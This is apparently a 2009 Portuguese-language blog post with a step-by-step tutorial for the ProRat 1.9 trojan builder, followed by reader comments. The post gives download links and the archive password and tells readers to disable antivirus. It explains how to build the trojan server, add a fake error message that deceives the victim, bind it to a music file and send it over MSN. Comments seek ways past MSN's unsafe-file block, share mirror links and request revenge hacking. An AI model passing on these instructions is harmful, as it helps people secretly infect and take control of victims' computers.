segunda-feira, 7 de setembro de 2009

ProRat 1.9 + Tutorial + Download

Para usar o prorat no seu PC vc precisa desativar temporariamente o seu anti virus (se ele for muito ruim nem precisa).


Com o Prorat vc cria trojans e manda para vitima e invadi o pc dela

Ele não é muito dificil de ser usado.

Criando servidor (Sever) basico:

1 - Faça o Download do ProRat aqui:http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2(ZipPass:pro)
Senha: pro

2 - Abra o Prorat.

3 - Vá em Criar e Criar Servidor Prorat.

4 - Vá direto em configurações os outros vc se não meche.

5 - Dar uma mensagem de erro falsa> clique em mensagem e escreva oq quiser
eu coloco " Não foi possivel executar o arquivo" assim qnd a vitima executa-lo
vai pensar q não aconteceu nada.

6 - (Opcional) Se vc quiser vc pode juntar seu sever cm um arquivo seu ex:uma musica
basta juntar servidor com arquivo> Selecionar arquivo> e escolher um arquivo.

7 - Extenções não mecha,só qnd vc aprender mais.

8 - Icone se vc quiser vc pode colocar um icone bunitinho no seu sever basta clicar em algum.

9 - Agora é só clicar em Criar Servidor> Quando ele terminar de carregar se não me engano seu servidor irá para a pasta "Prorat 1.9 SE"

10 - Ok agora basta mandar o servidor para a vitima e fazer ela executar o sever!

Obs: para mandar por msn precisa compactalo para isso use Winrar ou outro negocio para compactar arquivo.

NÃO CLIKE NO SEVER Q VC PODE INFECTAR O SEU PROPRIO PC!!!!

NÃO NOS RESPONSABILIZAMOS POR NADA!!!!!!!

37 comentários:

  1. o aquivo esta dando (final inesperado do arquivo) oque eu fasso

    ResponderExcluir
  2. ele ta dando erro quando eu tento abri-lo diz que o caminho nao existe oque eu faço?

    ResponderExcluir
  3. busca no 4shared prorat!
    e baixa esse link ja era em breve arrumo
    !

    ResponderExcluir
  4. ei cara q senha precisa para codificar o arquivo aperece isso

    ResponderExcluir
  5. qual a senha do arquivo zip por favor mandem
    valeu!!

    ResponderExcluir
  6. mande a senha pra mim por favor

    ResponderExcluir
  7. Isso eu tb sei, quero ver se vc sabe deixar o prorat invisivel

    ResponderExcluir
  8. ai mano eu queria saber por quê? o prorat não funciona no meu --pc, eu extraio ele para ária de trabalho ai ele some!!! é por quê ?

    ResponderExcluir
  9. Eliel:

    e porque seu anti-virus eta ativo desative o anti-virus e depois extraia
    espero ke tenka ajudado ..

    ResponderExcluir
  10. porque o pro rat não funciona no windows 7?

    ResponderExcluir
  11. qual versao do por rat funciona no windows 7?

    ResponderExcluir
  12. Meu Deus quantas perguntas de noob

    "Eu extraio ele pra area de trabalho e ele some"
    kkkkkkkkkkkkkkkkkkkkkkk
    outra boa
    qual versao do por rat funciona no windows 7?
    kasopdkpaoskdpoaskd
    pelo amor de deus
    tipo de caras que vão ser semple lammer
    noobs

    ResponderExcluir
  13. essa minha pergunta n é de noob te garando
    quando eu mando o trojan pelo msn aparece:O arquivo que você tentou enviar foi considerado potencialmente não seguro e não foi enviado.
    e eu ja tentei colocar ele em formato .rar e manda e tbm n funciono e eu até mechi la nas opções e transferencias de arquivos e ainda n consigo manda a merda do trojan como eu fasso pra manda e ñ aparecer aquela merda de mensagen?

    ResponderExcluir
  14. olha quando eu vou selecionar a linguagem a barra de rolagem não mexe,alguem podi me explicar o ocorrido ? o ProRat não tem problemas com o windows XP ? vlw espero a ajuda de um de vocês abraços

    ResponderExcluir
  15. kkkkkkkkkk so noob e lammer que usaro windows 7...

    ResponderExcluir
  16. Está dando vírus ake..
    Pq?

    ResponderExcluir
  17. esse não tem mais o anti virus reconhece como sendo virus por isso tem que desativar na hora de usar :D

    http://www.4shared.com/file/zG0Ofuu5/prorat.html

    ResponderExcluir
  18. eu consegui mo da hora

    ResponderExcluir
  19. eu baixei mas quando eu clico nao vai ee agora o que eu faço o meu pc e windows 7 o pro rat pega no windows 7 ??

    ResponderExcluir
  20. ou melhor deu erro e porque esse cara colocou o serve dele no programa tentou ospedar no servidos e corrompel na hora do donwlods das vitimas
    kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk

    ResponderExcluir
  21. quando eu mando o trojan pelo msn aparece:O arquivo que você tentou enviar foi considerado potencialmente não seguro e não foi enviado.

    como eu faço pra enviar o trojan ??

    ResponderExcluir
  22. Se esta dando erro pode ser um server camuflado no cliente do pro rat...
    tenta esse link, atualizado:
    http://www.wix.com/slhelp/prorat

    baixei de lá e não deu erro nenhum, mais tbm tem de ver se vc desativou o aV né!

    ResponderExcluir
  23. ai meu prorat acabei de adiquirir pede senha que senha e essa que eu nao sei onde eu acho ela ?

    ResponderExcluir
  24. Nao Desativo meu anti virus por nada nessa vida..

    ResponderExcluir
  25. Eu exporto, até aí blz...
    mais o ProRat.exe dezaparece???????????

    ResponderExcluir
  26. quando eu envio o arquivo e vou conectar o Prorat pra invadi n da certo, n aparece nenhuma senha pra colokkar,fik sempre desconectado, o q eu faço?

    ResponderExcluir
  27. mano baixei certinho estalhei configurei tudo blz ate ai.. mas quando vou mim conct ele nao cont.... poderia mim ajuda
    e uma outra pregunta eu usso net do mei vizinho pelo wif sendo que nao consegui abri a port do modem sera que e isso? estarei esperando pela sua ajudar desde jar obg....

    ResponderExcluir
  28. Não conecta por que a vitima máquina servidora precisa abrir o servidor que vc criou primeiro seu jumento... kkkkk, não tem nada a ver com porta no modem blz ?

    ResponderExcluir
  29. Bando de burro as vítimas não estão abrindo o executável de vocês, ninguém é mais tão tongo pra abrir qualquer coisa hoje em dia ... hehehe

    ResponderExcluir
  30. Aqueles que se consideram Hacker só por ter invadido com o Prorat, são apenas iniciantes, mas é um grande passo para a sofisticação de se tornar um, porém precisa pesquisar, ler e praticar mais. Respondendo uma pergunta que ficou no ar! "...O Prorat roda no Windows 7?" Resposta: Sim! Ele roda o programa PRORAT e vc consegue criar um Server, mas este serve não funcionará no Windows 7, apenas no Windows XP. Resumindo, o Windows 7 só cria o serve, mas sua funcionalidade dentro dele não lhe servirá de nada.

    ResponderExcluir
  31. OLÁ AMIGO UMA PESSOA ME HACKEOU E DETONOU O MEU JOGO E EU QUERIA FAZER O MESMO COM ELE MAS NÃO SEI COMO SE PODER ME AJUDAR ME ADD NO MSN MAQUINASCIELOBRASIL@HOTMAIL.COM
    POSSO LE RECOMPENSAR POR ISSO

    ResponderExcluir
  32. tipo,onde fica a pasta onde o server está???

    ResponderExcluir
  33. Onde esta a senhaaa:

    ResponderExcluir
  34. william BAtista: só link quebrado..lixo

    ResponderExcluir
  35. eu coloco a senha pro e o programa nao decodifica

    ResponderExcluir